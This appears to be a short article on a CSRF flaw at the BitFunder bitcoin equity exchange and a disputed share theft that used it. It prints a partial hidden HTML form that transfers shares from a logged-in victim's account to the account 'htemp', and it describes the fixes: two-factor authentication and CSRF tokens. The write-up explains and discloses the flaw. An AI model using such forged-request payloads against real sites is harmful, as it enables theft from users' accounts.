BitFunder is one of the largest bitcoin equity exchanges. Users are able to quickly trade for bitcoin-denominated equity in a market with significantly more liquidity than on the bitcointalk.org forums, the primary alternative. BitFunder currently controls over $12 million in assets (full table is at end), the largest of these are AMC $5.7M, Kenilworth $4.7M, and ASICMINER $4.5M. Additionally, BitFunder controls an undisclosed amount of BTC that users have stored in their wallets waiting for proper investment.
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
<input type="hidden" name="asset" value="g.sdpt">
<input type="hidden" name="amount" value="100">
<input type="hidden" name="to_name" value="htemp">
The above html will use your current BitFunder session to send 100 shares of the asset “g.sdpt” to the account “htemp”. Malicious users could embed this code on any web page to transfer shares to their own account; meaning if you have BitFunder open, any web site opened on another tab could have been able to transfer shares from your account. There were two requirements for this to execute: users must be currently logged into their BitFunder account, and the user has not enabled two factor authentication.
BitFunder has been hesitant to issue a refund since the possibility of fraud is so high. It is difficult to determine whether HostRider had their account legitimately hacked, or simply traded the shares to htemp intentionally. When the transfer occurred, two factor authentication was not required to transfer shares. The day after this was discovered BitFunder enabled two factor authentication for all share transfers by default. Two factor authentication could also be mitigated by implementing CSRF tokens into their browser sessions, which would prevent these cross-site forgeries.
BitFunder should be treated like any other banking website. Users should implement two factor authentication whenever possible and log out of any active sessions when their transactions are completed. Additionally, using private browsing sessions will reduce the likelihood of other browser tabs being able to access account information. It remains to be seen whether other similar loopholes exist on BitFunder for users that do not have these security measures enabled, so this theft should serve as a lesson for all users to enable two factor authentication as soon as possible.